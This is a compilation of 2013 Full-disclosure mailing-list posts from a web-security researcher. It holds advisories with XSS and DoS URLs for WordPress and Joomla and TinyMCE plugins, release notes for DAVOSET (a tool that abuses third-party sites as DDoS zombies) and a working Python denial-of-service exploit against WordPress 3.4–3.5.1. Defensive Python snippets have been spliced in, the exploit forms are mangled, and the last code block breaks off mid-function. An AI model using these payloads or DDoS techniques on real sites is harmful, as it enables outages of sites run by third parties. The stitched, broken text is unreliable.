2013.03.04 - informed developers about part of the vulnerabilities.
2013.04.03 - informed developers about another part of the vulnerabilities.
2013.04.07 - informed developers about another part of the vulnerabilities.
2013.05.24 - announced at my site.
2013.05.25 - informed developers about another part of the vulnerabilities.
2013.05.26 - informed developers about another part of the vulnerabilities.
In all cases the developers just ignored all messages via different e-mails and the contact form.
2013.07.31 - disclosed at my site (http://websecurity.com.ua/6535/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] DAVOSET v.1.1.2
Hello participants of Mailing List.

After making the public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made the next update of the software. Today DAVOSET v.1.1.2 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/).

Download DAVOSET v.1.1.2:
http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.1.2.rar

Use, don't abuse.

Among other improvements in the new version, in 1.1.2 there was added support of XML requests for XXE vulnerabilities. So now you can use XML External Entities vulnerabilities at web sites for conducting DoS and DDoS attacks. Also there were added new services into the full list of zombies.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] DoS and XSS vulnerabilities in Googlemaps plugin for Joomla
Hello list!

Earlier I wrote about multiple vulnerabilities in Googlemaps plugin for Joomla (http://securityvulns.ru/docs29645.html). After my informing, the developer fixed these vulnerabilities in versions 2.19 and 3.1 of the plugin by removing the proxy functionality. And in version 3.2 of the plugin he introduced new proxy functionality, which must be protected against the previous attacks. But after my checking, I've found two holes in the last version of the plugin.

These are Denial of Service and Cross-Site Scripting vulnerabilities in Googlemaps plugin for Joomla.

- Affected products: -

Vulnerable is Googlemaps plugin v3.2 for Joomla.

I've informed the developer about these holes. Now he is working on a new version.

- Affected vendors: -

Mike Reumer
http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147

-- Details: --

To bypass the protection for accessing this script it's needed to set referer, cookie and token. The referer is the current site, the cookie is set by the site (Joomla) itself and the token can be found at the page of the site which uses the plugin (and it's set in the URL). This data can be taken from the site automatically.

Referer: http://site
Cookie: dc9023a0ff4f8a00f9b2f4e7600c17f4=69c59f0263b70f9343e0a75a93bd44a0

Denial of Service (WASC-10):

http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/large_file&1e17f7d3d74903775e5c524dbe2cd8f1=1

Besides conducting a DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks using DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008879.html).

Cross-Site Scripting (WASC-08):

http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/xss.html&1e17f7d3d74903775e5c524dbe2cd8f1=1

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] DAVOSET v.1.1.1
Hello participants of Mailing List.

After making the public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made the next update of the software. Yesterday DAVOSET v.1.1.1 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/).

Download DAVOSET v.1.1.1:
http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.1.1.rar

Use, don't abuse.

Besides improvements in the new version, in 1.1.1 there were added a lot of new zombie-services - 105 new services, most of them web sites with Googlemaps plugin for Joomla. Also I've improved work with services which don't support "http://" for the target site (this is made for Googlemaps).

Last week one man, who likes DAVOSET, sent me a large list of zombie-servers for my tool (big thanks to him). In that list I found a lot of web sites with Googlemaps, which I checked and found multiple vulnerabilities in this plugin, which I disclosed recently.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] AFU and XSS vulnerabilities in TinyMCE Image Manager
Hello list!

These are Arbitrary File Uploading and Cross-Site Scripting vulnerabilities in TinyMCE Image Manager plugin for TinyMCE.

- Affected products: -

Vulnerable are TinyMCE Image Manager 1.1 and previous versions.

- Affected vendors: -

Dustweb
http://dustweb.ru/projects/tinymce_images/

-- Details: --

Arbitrary File Uploading (WASC-31):

The attack is possible via "1.asp" in the folder name. This is a bypass method for executing arbitrary code at IIS web server.

TinyMCE Image Manager AFU.html

TinyMCE Image Manager Arbitrary File Uploading exploit (C) 2013 MustLive. http://websecurity.com.ua
action="http://site/tiny_mce/plugins/images/connector/php/" method="post">

Cross-Site Scripting (WASC-08):

This is persistent XSS on Linux/Unix and reflected XSS on Windows. The code will execute just after sending the request for creating a folder and later on at requests to the connector (at any operations, except creating a folder with an existing name).

TinyMCE Image Manager XSS.html

TinyMCE Image Manager XSS exploit (C) 2013 MustLive. http://websecurity.com.ua
action="http://site/tiny_mce/plugins/images/connector/php/" method="post">

Timeline:

2013.05.22 - announced at my site.
2013.05.23 - informed developer.
2013.07.18 - disclosed at my site (http://websecurity.com.ua/6527/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Re: [Full-disclosure] DDoS attacks via other sites execution tool
Hello psy!

I'm glad that you liked DAVOSET. And I'm glad that you liked my articles, including those old articles about attacks via redirectors (Redirectors' hell and Hellfire for redirectors). Such attacks can be used together with XSS holes. So it can be useful for your tool. Specially for using with your UFONet - to use XSS holes with looped redirectors to conduct more powerful DDoS attacks - I released an advisory about Denial of Service vulnerabilities in WordPress at 27.06.2013. Any redirector at any web site or any redirector service can be used with XSS vulnerabilities to conduct a DDoS attack via UFONet.

> Curiously, I posted a tool written in python the same day. It is called: UFONet

I made my tool already in 2010. That time I made an announcement of the tool, where I described DAVOSET and its effectiveness, but didn't release the tool. I made it private and gave it only to one security researcher, who wanted to look at it. I didn't want to give such a kind of attacking tool to script kiddies (to prevent mass attacks, because there were a lot of such Abuse of Functionality vulnerabilities on the Internet since 2007, when I started finding them and presented them in zombie-lists with my tool). But because for three years people continued to ignore such holes and almost nobody fixed such holes (just a few of the most serious ones, and even Yahoo lamerly ignored for a long time such a hole in their Babelfish and in 2012 just lamerly closed it), I decided to release it publicly in June 2013.

> My idea now, is to work the detection of new 'zombies' by crawlering techniques and increase the "strike" capability requests.

Good ideas. But concerning automated searching of XSS holes by crawling: it'll already be an XSS scanner, not just an attacking tool for using existing vulnerabilities, and it'll give a lot of power to an attacker. No need for him to find XSS holes, your tool will do everything for him ;-). Just enter the target site and UFONet will do all the work (find a lot of zombies and attack the target with all of them), so be careful with such functionality.

> I have seen that your tool doesn't allow the use of proxies. It may be interesting to add that functionality.

Thanks for the suggestion. I've added it to the ToDo - in addition to all my ideas (which I have a lot of). The reason why I've not done it earlier and was not planning to is simple - DAVOSET is using other sites as proxies for conducting DoS attacks. So target sites, after receiving DDoS attacks from multiple zombie sites, will see in their logs only Google, W3C and other sites/IPs. So proxying is part of the attack :-). But for paranoids, who worry that admins of zombie-sites will give their logs to admins of victim-sites (or not admins, but special services), an additional proxy will be a good solution (and I'll add proxy support in the future).

> + Video: http://vimeo.com/68772290

I've seen your video. And I wrote you feedback about the video and some feedback about UFONet last month. And will write more feedback soon. Keep working on your software. Concerning your release of v.0.2: think about making a more detailed changelog (not just a mention of the release of a new version, but with a detailed description of the changes).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message -
From: "psy"
To: "MustLive"
Cc:
Sent: Wednesday, June 19, 2013 10:25 PM
Subject: Re: [Full-disclosure] DDoS attacks via other sites execution tool

> Hi,
>
> On 18/06/13 22:50, MustLive wrote:
> > Hello participants of Mailing List.
> >
> > If you haven't read my article (written in 2010 and last week I wrote about it to WASC list) Advantages of attacks on sites with using other sites (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008846.html), feel free to do it.
> >
> > In this article I reminded you about using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html), DDoS attacks via other sites execution tool (DAVOSET) (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006832.html), sending spam via sites and creating spam-botnets (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006863.html) and wrote about advantages of attacks on sites with using other sites.
>
> I have read the articles and they are very interesting, for example, the "hell" redirection. This kind of web abuse can be very powerful. Nice work! ;-)
>
> > Last week I've published online my DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). It's tool for conducting of DDoS attacks via Abuse of Functionality vulnerabilities on the sites, which I've made in 2010. Description and changelog on English are presented at my site. Where you can get my DAVOSET v.1.0.5 (made at 18.0
[Full-disclosure] Multiple vulnerabilities in Googlemaps plugin for Joomla
Hello list!

These are Denial of Service, XML Injection, Cross-Site Scripting and Full path disclosure vulnerabilities in Googlemaps plugin for Joomla.

- Affected products: -

Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x and potentially previous versions.

In the new version of DAVOSET I'll add a lot of web sites with Googlemaps plugin.

- Affected vendors: -

Mike Reumer
http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147

-- Details: --

Denial of Service (WASC-10):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file

Besides conducting a DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks using DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).

XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml

It's possible to include external xml-files. Which also can be used for an XSS attack:

XSS via XML Injection (WASC-23):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml

File xss.xml:

XSS xmlns="http://www.w3.org/1999/xhtml";>alert(document.cookie)

Cross-Site Scripting (WASC-08):

http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/plugins/content/plugin_googlemap2_proxy.php

Besides plugin_googlemap2_proxy.php, the same also happens in plugin_googlemap3_proxy.php (but it has a different path at web sites).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
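This post and the Googlemaps v3.2 post above (plugin_googlemap3_kmlprxy.php) describe one design defect from two angles: a server-side proxy that fetches whatever the `url` parameter names and returns the body to the browser. The v3.2 fix gated *who* may call the proxy (referer, cookie, token), and the post shows that those values come from the site itself, so they do not limit *where* the proxy may go. The block below is an added example (not the plugin's code and not the author's) of the controls that do address the three findings: a destination allowlist against the open-proxy and XSS cases, a capped read against the `large_file` DoS, and a MIME check so an HTML body is never relayed. The allowed hosts, the byte limit and the sample inputs are assumptions made for the demonstration.

```python
"""Destination and size controls for a server-side fetch proxy.

Added example, not code from the Googlemaps plugin for Joomla. Allowed hosts,
size limit and sample inputs are assumptions chosen for the demonstration.
"""
import io
from urllib.parse import urlsplit

# Assumed: the only upstreams a KML/map proxy legitimately needs.
ALLOWED_HOSTS = frozenset({"maps.google.com", "maps.googleapis.com"})
# Assumed: generous for KML, small enough that a huge upstream body is cheap to refuse.
MAX_BYTES = 512 * 1024
# Only XML-ish bodies are passed through; HTML is what the xss.html case relies on.
ALLOWED_MIME = frozenset({"application/vnd.google-earth.kml+xml", "application/xml", "text/xml"})


def validate_proxy_target(url: str, allowed_hosts=ALLOWED_HOSTS) -> tuple:
    """Return (ok, reason). ok is True only for an http(s) URL whose host is allowlisted.

    Checking the parsed hostname (not a substring of the raw string) is what
    keeps 'http://maps.google.com.attacker.example/' and userinfo tricks out.
    """
    parts = urlsplit(url.strip())
    if parts.scheme not in ("http", "https"):
        # 'site2/large_file' has no scheme; file:// and other schemes are refused too.
        return False, "scheme not allowed"
    host = parts.hostname
    if not host:
        return False, "no host"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"
    if host.lower() not in allowed_hosts:
        return False, "host not in allowlist"
    return True, "ok"


def read_capped(stream, limit: int = MAX_BYTES):
    """Read at most `limit` bytes from a response body.

    Returns the bytes, or None if the body is larger than the limit. Reading in
    chunks and stopping one byte past the limit means an attacker-chosen
    large_file costs the proxy at most `limit` bytes, not the whole download.
    """
    buf = bytearray()
    while len(buf) <= limit:
        chunk = stream.read(min(65536, limit + 1 - len(buf)))
        if not chunk:
            return bytes(buf)
        buf.extend(chunk)
    return None


def mime_allowed(content_type: str) -> bool:
    """True if the upstream Content-Type (parameters stripped) is an allowed XML type."""
    mime = content_type.split(";", 1)[0].strip().lower()
    return mime in ALLOWED_MIME


def proxy_decision(url: str, content_type: str, body_stream) -> dict:
    """Combine the three checks the way a proxy handler would, in order:
    decide the destination before connecting, then the type, then the size."""
    ok, reason = validate_proxy_target(url)
    if not ok:
        return {"allowed": False, "reason": reason}
    if not mime_allowed(content_type):
        return {"allowed": False, "reason": "content type not allowed"}
    body = read_capped(body_stream)
    if body is None:
        return {"allowed": False, "reason": "body too large"}
    return {"allowed": True, "reason": "ok", "body": body}


if __name__ == "__main__":
    # Constructed inputs mirroring the post's cases.
    for candidate in ("site2/large_file", "http://site2/xss.html",
                      "http://maps.google.com/maps/ms?msid=1&output=kml"):
        print(candidate, "->", validate_proxy_target(candidate))
    print(proxy_decision("http://maps.google.com/x.kml", "text/html", io.BytesIO(b"<html>")))
    print(proxy_decision("http://maps.google.com/x.kml", "text/xml; charset=utf-8",
                         io.BytesIO(b"<kml/>"))["allowed"])
```

Two caveats a practitioner should keep in mind: the allowlist is only as good as the hosts on it (an allowed host that is itself an open redirector reopens the proxy), and the MIME check does not by itself neutralise the xss.xml case in this post, where the body is XML with an XHTML namespace; the destination allowlist is the control that stops that one, which is why it runs first.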
[Full-disclosure] DAVOSET v.1.1
Hello participants of Mailing List.

After making the public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made the next update of the software. Today DAVOSET v.1.1 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/).

Download DAVOSET v.1.1:
http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.1.rar

Use, don't abuse.

Besides improvements and fixes in the new version, in 1.1 there was added logging. So now people can log their activity with the tool. Also I've described usage of the tool in readme.txt - added descriptions of the different attacks which I wrote about in my articles. So it must become easier for new users of the program to understand it.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] XSS and CS vulnerabilities in TinyMCE Image Manager
Hello list!

These are Cross-Site Scripting and Content Spoofing vulnerabilities in TinyMCE Image Manager plugin for TinyMCE.

- Affected products: -

Vulnerable are TinyMCE Image Manager 1.1 and previous versions.

- Affected vendors: -

Dustweb
http://dustweb.ru/projects/tinymce_images/

-- Details: --

Cross-Site Scripting (WASC-08):

http://site/path/images/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/path/images/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Content Spoofing (WASC-12):

http://site/path/images/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E
http://site/path/images/js/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif

Timeline:

2013.05.18 - announced at my site.
2013.05.18 - informed developer.
2013.07.12 - disclosed at my site (http://websecurity.com.ua/6517/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] XSS, CS and FPD vulnerabilities in I Love It theme for WordPress
Hello list!

These are Cross-Site Scripting, Content Spoofing and Full path disclosure vulnerabilities in I Love It theme for WordPress. This is a commercial (premium) theme.

- Affected products: -

All versions of I Love It theme for WordPress. The theme contains vulnerable versions of Audio Player and GDD FLVPlayer.

- Affected vendors: -

CosmoThemes
http://cosmothemes.com

-- Details: --

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/iloveit/lib/php/assets/player.swf?playerID=%22))}catch(e){alert(document.cookie)}//

Content Spoofing (WASC-12):

http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf

There are 10 vulnerabilities in GDD FLVPlayer: 8 CS and 2 XSS. I announced them recently (http://websecurity.com.ua/6642/) and informed the developers of GDD FLVPlayer. These vulnerabilities will be disclosed later.

Full path disclosure (WASC-13):

http://site/wp-content/themes/iloveit/

There are FPD vulnerabilities in index.php and other php-files (in the folder and subfolders).

Timeline:

2013.05.24 - informed CosmoThemes about vulnerabilities in their I Love It New theme.
2013.07.11 - disclosed at my site (http://websecurity.com.ua/6646/).
2013.07.12 - informed developers about vulnerabilities in their I Love It theme.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] CS, XSS and FPD vulnerabilities in WordPress
Hello list!

These are Content Spoofing, Cross-Site Scripting and Full path disclosure vulnerabilities in WordPress.

At the WordPress 3.5.2 release (the same at the 3.5.1 release), WP developers mentioned multiple fixed holes, but not all of them - to make it look like there were fewer fixed holes. So I'm revealing this information for you.

In March I wrote about Content Spoofing and Cross-Site Scripting vulnerabilities in SWFUpload (http://securityvulns.ru/docs29181.html) (which is also bundled with WordPress), and I mentioned that they concerned only versions before WordPress 3.3.2 and were fixed in version 3.3.2 together with the 2012 XSS hole. But I checked these holes in older versions of WP and in version 3.5.1. And as I found two weeks ago, these CS and XSS vulnerabilities were fixed exactly in WordPress 3.5.1. So versions 3.3.2 - 3.5 are still vulnerable, and in version 3.5.1 the developers included an updated version of SWFUpload without mentioning these fixes (they like to do such things); they only mentioned the fixes in SWFUpload in version WP 3.5.2.

There are fixed vulnerabilities in WordPress 3.5.2 which are not mentioned in the announcement and codex. Like the below-mentioned Full path disclosure vulnerability (which I disclosed last week), even though they have mentioned FPD during upload.

- Affected products: -

For CS and XSS vulnerable are versions WordPress 2.7 - 3.5.
For FPD vulnerable are versions WordPress 3.4 - 3.5.1.

-- Details: --

Content Spoofing (WASC-12):

http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

It's possible to inject text, images and html (e.g. for link injection).

Cross-Site Scripting (WASC-08):

http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Code will execute after click. It's strictly social XSS.

Full path disclosure (WASC-13):

http://site/wp-admin/users.php?s=http://

There is FPD when the search string starts with http:// or https://.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] DAVOSET v.1.0.9
Hello participants of Mailing List.

After making the public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made the next update of the software. On Friday, 05.07.2013, DAVOSET v.1.0.9 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/).

Download DAVOSET v.1.0.9:
http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.0.9.rar

Use, don't abuse.

Among other improvements in the new version, in 1.0.9 support of CSRF tokens was added. And a new service was added into the full list of zombies (exactly for requests with CSRF tokens). This is browsershots.org; I wrote about vulnerabilities in it in 2010 and informed the admins, who lamerly ignored fixing the vulnerabilities (only added a token, which is easily bypassed, as I showed). One request to this service leads to 158 requests to the target site.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Re: [Full-disclosure] DDoS attacks via other sites execution tool
Hello Julius!

Looks like you haven't read my articles, which I referenced in my letter. Such as Using of the sites for attacks on other sites - this is my 2010 article based on my 2009 article DoS attacks via Abuse of Functionality vulnerabilities. In the new article I combined different attacks (which can be used for attacks on other sites) and added new examples of vulnerable sites to draw attention to this problem.

Yes, it's brilliant. And not only GET requests - since DAVOSET v.1.0.8 the tool also supports POST requests ;-).

My tool is designed to automate such attacks on other sites. If you want to do the attacks manually (using all those vulnerable sites, including those in my lists of zombies), feel free to do it. Like using them as proxies (to hiddenly visit sites), or sending CSRF requests for different attacks on those sites, or making DoS attacks. Which are especially effective when many sites are combined together, i.e. to make DDoS attacks which use not clients, but servers as zombies. Servers have larger channels, so they are a more effective weapon for conducting DDoS attacks. And exactly for automating these things I've created my tool. Yes, it can be used for attacking with only one zombie-server, but it's good at making DDoS attacks with multiple servers (it handles any amount of servers very well).

For understanding the possibilities of DoS attacks via AoF vulnerabilities it's needed to read those 2009-2010 articles of mine.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message -
From: Julius Kivimäki
To: MustLive
Cc: full-disclosure@lists.grok.org.uk
Sent: Friday, June 21, 2013 7:36 PM
Subject: Re: [Full-disclosure] DDoS attacks via other sites execution tool

So you made a perl script to make GET requests on a list of URLs? Brilliant.

2013/6/18 MustLive

Hello participants of Mailing List.

If you haven't read my article (written in 2010; last week I wrote about it to the WASC list) Advantages of attacks on sites with using other sites (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008846.html), feel free to do it. In this article I reminded you about using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html), DDoS attacks via other sites execution tool (DAVOSET) (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006832.html), sending spam via sites and creating spam-botnets (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006863.html) and wrote about the advantages of attacks on sites with using other sites.

Last week I've published online my DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). It's a tool for conducting DDoS attacks via Abuse of Functionality vulnerabilities on the sites, which I made in 2010. The description and changelog in English are presented at my site, where you can get my DAVOSET v.1.0.5 (made on 18.07.2010). This is the last version of my DAVOSET. After that I stopped its development. But now I am planning to continue development of the software and to release new versions (I'll release v.1.0.6 today).

For three years I was holding this tool privately, but now I have released it for free access. So everyone can test Abuse of Functionality vulnerabilities at multiple web sites - like Google's sites, W3C and many others, which were informed by me many times during many years (I have been informing admins of web sites about such vulnerabilities since 2007), but ignored and don't want to fix these holes for a long time; for example, Google continued to create new services with Abuse of Functionality and Insufficient Anti-automation vulnerabilities, which can be used for such DoS and DDoS attacks.

It must bring attention to the danger of these vulnerabilities (which I was trying to do in my articles in 2010). Because in most cases owners of web sites and web developers ignore and don't fix them. Which can be used for DoS attacks both on other sites and on the sites with Abuse of Functionality vulnerabilities themselves, about which I wrote in my article Using of the sites for attacks on other sites.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Cross-Site Scripting vulnerabilities in WordPress
Hello list!

These are Cross-Site Scripting vulnerabilities in WordPress, which I've disclosed last week.

At the WordPress 3.5.2 release, WP developers mentioned three holes as "security hardenings" (to decrease their importance and to make it look like there were fewer fixed holes). One of these holes is "Cross-Site Scripting (XSS) when Editing Media". After I checked the media editing functionality, I've found that it was not one hole, but two holes, and these were persistent XSS.

- Affected products:

Vulnerable are WordPress 3.5.1 and previous versions.

-- Details: --

Cross-Site Scripting (WASC-08):

These are persistent XSS vulnerabilities at the page http://site/wp-admin/post.php?post=1&action=edit in the parameters excerpt and content. For the attack it's needed to bypass the protection against CSRF (to receive the token _wpnonce, which can be done using reflected XSS).

WordPress 3.5.1 XSS-1.html

WordPress 3.5.1 XSS exploit
(C) 2013 MustLive
http://websecurity.com.ua

http://site/wp-admin/post.php" method="post">
value="alert(document.cookie)">

The code will execute just after sending the request at the page http://site/wp-admin/post.php?post=1&action=edit and at subsequent visits to this page.

WordPress 3.5.1 XSS-2.html

WordPress 3.5.1 XSS exploit
(C) 2013 MustLive
http://websecurity.com.ua

http://site/wp-admin/post.php" method="post">
value="alert(document.cookie)">

The code will execute just after sending the request at the page http://site/wp-admin/post.php?post=1&action=edit and at subsequent visits to this page or the page http://site/page_name/attachment/1/.

Timeline:

2013.06.21 - released WordPress 3.5.2.
2013.06.29 - disclosed at my site (http://websecurity.com.ua/6616/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Content Spoofing vulnerabilities in TinyMCE and WordPress
Hello list!

These are Content Spoofing vulnerabilities in TinyMCE and WordPress, which I've disclosed on Wednesday.

In 2011 I already wrote about Content Spoofing in Moxieplayer, when I wrote concerning multiple vulnerabilities in TinyMCE (http://securityvulns.ru/docs27349.html); it is a component of the Media plugin for TinyMCE (it's a part of the core of TinyMCE). This visual editor is bundled with hundreds of web applications, particularly with WordPress. This flash file is bundled with WP since version 3.3.

- Affected products:

Vulnerable are versions TinyMCE 3.4b2 - 4.0b3. For the first vulnerability, versions WordPress 3.3 - 3.4.2 are vulnerable. For the second vulnerability, versions WordPress 3.3 - 3.5.1 are vulnerable. This hole was fixed in WordPress 3.5.2 (note that WP developers incorrectly called this CS hole XSS in the announcement at their site, while in the codex they wrote it correctly).

-- Details: --

Content Spoofing (WASC-12):

The previous vulnerability, which I found in 2011, looked like this (since TinyMCE 3.4b2; in version 3.4.7 it was fixed):

http://site/moxieplayer.swf?url=http://site2/1.flv

Then recently a new vulnerability was found (by Wan Ikram), which allows bypassing the protection and conducting a CS attack:

http://site/moxieplayer.swf#?url=http://site2/1.flv

In June this vulnerability was fixed. The updated version of Moxieplayer is present in TinyMCE 4.0.

In WordPress the attack using this flash-file looks like this.

The first variant (WP 3.3 - 3.4.2):
http://site/wp-includes/js/tinymce/plugins/media/moxieplayer.swf?url=http://site2/1.flv

The second variant (WP 3.3 - 3.5.1):
http://site/wp-includes/js/tinymce/plugins/media/moxieplayer.swf#?url=http://site2/1.flv

Timeline:

2013.06.21 - released WP 3.5.2 with updated version of Moxieplayer.
2013.06.26 - disclosed at my site (http://websecurity.com.ua/6604/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] WordPress Denial of Service exploit
Hello list!

Here is my version of vnd's PoC (https://vndh.net/note:wordpress-351-denial-service). This exploit is for the Denial of Service vulnerability in WordPress 3.4 - 3.5.1. My version solves some issues in the original PoC.

Concerning this Denial of Service in WordPress. As I wrote last week in my post concerning the release of WordPress 3.5.2, this issue concerns both posts and pages which are password protected. Not only posts, as vnd wrote and similarly WP guys wrote at their site (in the WP 3.5.2 announcement and in the codex). Since WordPress supports a password at both posts and pages, as I wrote in 2010 concerning Brute Force and Insufficient Authorization vulnerabilities in WordPress (http://www.securityfocus.com/archive/1/510274).

wordpress-dos.py

    # WordPress Denial of Service exploit
    # WordPress 3.4 - 3.5.1
    # Author: vnd at vndh.net
    # Version by MustLive (http://websecurity.com.ua)
    # Python 2 script (httplib, xrange, print statement).

    import httplib
    import re


    def get_cookie_hash(hostname, url):
        # POST an empty password to wp-pass.php so the site answers with a
        # wp-postpass_<hash> cookie; the 32-hex-digit suffix is site-specific.
        headers = {'Content-type': 'application/x-www-form-urlencoded'}
        handler = httplib.HTTPConnection(hostname)
        handler.request('POST', url, 'post_password=', headers=headers)
        response = handler.getresponse()
        set_cookie = response.getheader('set-cookie')
        if set_cookie is None:
            raise RuntimeError('cannot fetch set-cookie header')
        pattern = re.compile('wp-postpass_([0-9a-f]{32})')
        result = pattern.search(set_cookie)
        if result is None:
            raise RuntimeError('cannot fetch cookie hash')
        return result.groups()[0]


    def send_request(hostname, post, cookie_name):
        # Replay the request to the protected post with the crafted cookie value.
        headers = {'Cookie': 'wp-postpass_%s=%%24P%%24Spaddding' % cookie_name}
        handler = httplib.HTTPConnection(hostname)
        handler.request('GET', post, 'action=postpass&post_password=a', headers=headers)


    if __name__ == '__main__':
        hostname = 'site'
        posturl = '/?p=4'  # link to password protected post or page
        requests = 1000
        # wp-pass.php lives in the same directory as the post URL
        pattern = re.compile('(.+/)')
        url = pattern.search(posturl).groups()[0] + 'wp-pass.php'
        cookie_hash = get_cookie_hash(hostname, url)
        print '[+] received cookie hash: %s' % cookie_hash
        for i in xrange(requests):
            print '[+] sending request %d...' % (i + 1)
            send_request(hostname, posturl, cookie_hash)

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
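The cookie value in the script above, "$P$Spaddding", is a phpass setting string: the fourth character encodes log2 of the MD5 iteration count, so a client-chosen value can ask the server to run 2**30 rounds for every request. The following is an added example (not code from the advisory, from vnd's PoC or from WordPress) of the server-side check that closes this: parse the cost out of a client-supplied hash and refuse anything above the cost the site itself uses, plus a scan over constructed log lines to spot such cookies after the fact. The site cost value, cookie names and log lines are assumptions.

```python
"""Checking the cost encoded in a phpass-style hash before verifying it."""
import re
from urllib.parse import unquote

# phpass alphabet: the index of setting[3] in this string is count_log2.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# WordPress hashes with PasswordHash(8, true), which writes "$P$B"
# (8 + 5 = 13, i.e. 8192 rounds). Assumed here as the site's own cost.
SITE_COUNT_LOG2 = 13


def phpass_count_log2(setting):
    """Return log2 of the iteration count in a "$P$"/"$H$" setting, or None."""
    if len(setting) < 4 or setting[:3] not in ("$P$", "$H$"):
        return None
    idx = ITOA64.find(setting[3])
    # phpass itself refuses values outside 7..30; treat those as malformed.
    if idx < 7 or idx > 30:
        return None
    return idx


def phpass_iterations(setting):
    """Number of MD5 rounds the setting would cost, or None if malformed."""
    log2 = phpass_count_log2(setting)
    return None if log2 is None else 1 << log2


def is_acceptable_hash(setting, max_count_log2=SITE_COUNT_LOG2):
    """Accept only well-formed settings whose cost does not exceed the site's."""
    log2 = phpass_count_log2(setting)
    return log2 is not None and log2 <= max_count_log2


# Matches a wp-postpass cookie inside a log line; the value is URL-encoded.
COOKIE_RE = re.compile(r'wp-postpass_[0-9a-f]{32}=([^;\s"]+)')


def over_cost_postpass_cookies(log_lines, max_count_log2=SITE_COUNT_LOG2):
    """Return (line_no, decoded_value, iterations) for cookies above the allowed cost.

    `log_lines` are access-log style lines that include the Cookie header
    (constructed for this example; real logs need that field enabled).
    """
    findings = []
    for n, line in enumerate(log_lines, 1):
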